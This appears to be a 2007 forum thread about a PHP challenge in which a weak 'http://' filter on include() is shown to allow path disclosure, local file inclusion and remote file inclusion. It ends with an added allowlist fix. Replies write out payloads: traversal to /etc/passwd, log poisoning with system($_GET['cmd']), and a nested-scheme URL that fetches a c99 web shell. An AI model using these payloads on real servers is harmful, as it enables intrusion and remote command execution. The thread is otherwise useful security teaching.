kw3rln Posted September 3, 2007
<?php
if (isset($_REQUEST['doc'])) {
    $doc = $_REQUEST['doc'];
    // Anti-RFI protection
    $doc = str_replace('http://', '', $doc);
    include($doc);
}
?>
Vulnerable to 3 attacks; see which ones they are.

amprenta Posted September 3, 2007
Well, there would be path disclosure, i.e. doc=cacat .. will give us an error Warning ..... NO SUCH file or directory in "/home/draci/public_html/raha.php"
file disclosure - doc=../../../../etc/passwd, for example

x.o Posted September 3, 2007
LFI, remote command execution + RFI

kw3rln Posted September 3, 2007 (Author)
yep.. but it's RFI too

vladiii Posted September 3, 2007
> yep.. but it's RFI too
I was the first one to tell you about this on Messenger

moubik Posted September 4, 2007
yes, it was obvious; too bad I wasn't here over the weekend

Imperfect Posted October 9, 2007
kw3rln, make more challenges like this!

michee Posted October 27, 2007
If possible, could you clear this up for me too.
Remote code execution, I think, would be if I do something like doc = <? system($_GET['cmd'])?> , Apache logs that somewhere and then I use LFI to execute it, right?
How is RFI done? Does it work to include a remote file if I just do doc='www.hackserver.com/cmd.php' for example? I mean without http in front?
Or how is RFI done here?

michee Posted October 28, 2007
and you still haven't cleared it up for me.....

kw3rln Posted October 28, 2007 (Author)
> and you still haven't cleared it up for me.....
We have $doc = str_replace('http://','',$doc); right?
If you put $doc= httphttp://://site.com/c99.txt? what happens?

michee Posted October 28, 2007
hahaha :)) yes, nice.

lucian Posted October 28, 2007
For RFI, ftp://user:pass@host/fisier would also work,
and theoretically I think mms://host/fisier would work too,
or gopher ... now I'm not sure ... that these work ... has anyone tried them? ... because I've seen on several sites that the URL was checked for whether it also contains the protocols ftp ... telnet ... mms ... gopher,
like ... if(!eregi("(http://|https://|ftp://|telnet://|mms://|gopher://|news://) .....
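
Added example, not part of the thread: the single-pass str_replace filter from the first post next to an allowlist lookup, run over inputs quoted in the posts above. The function names, the page map and the temporary pages_demo directory are assumptions made for the demonstration.

```php
<?php
// Added example; names and paths below are assumptions, not from the thread.

// Filter from the first post: a single pass that deletes 'http://'.
function strip_http(string $doc): string
{
    return str_replace('http://', '', $doc);
}

// Hypothetical page map: the request value is only a lookup key,
// so no part of it ever reaches include() as a path or URL.
const PAGES = ['home' => 'home.php', 'about' => 'about.php'];

function resolve_doc(string $doc, string $baseDir): ?string
{
    if (!array_key_exists($doc, PAGES)) {
        return null; // unknown key: refuse
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . PAGES[$doc]);
    if ($base === false || $path === false) {
        return null; // directory or file missing
    }
    // Defence in depth: the resolved file must sit inside $baseDir.
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Constructed demo directory with one page.
$baseDir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'pages_demo';
if (!is_dir($baseDir)) {
    mkdir($baseDir);
}
file_put_contents($baseDir . DIRECTORY_SEPARATOR . 'home.php', "<?php echo 'home';\n");

// Inputs quoted in the posts above, plus one valid key.
$samples = [
    'httphttp://://site.com/c99.txt',
    '../../../../etc/passwd',
    'ftp://user:pass@host/fisier',
    'home',
];
foreach ($samples as $s) {
    $allow = resolve_doc($s, $baseDir) ?? 'rejected';
    printf("%s\n  after filter: %s\n  allowlist:    %s\n", $s, strip_http($s), $allow);
}
```

The first sample leaves the filter as http://site.com/c99.txt because str_replace does not rescan its own output, and the traversal and ftp:// values pass through unchanged, while the allowlist rejects all three. Setting allow_url_include = Off in php.ini (the default) additionally stops include from fetching URLs.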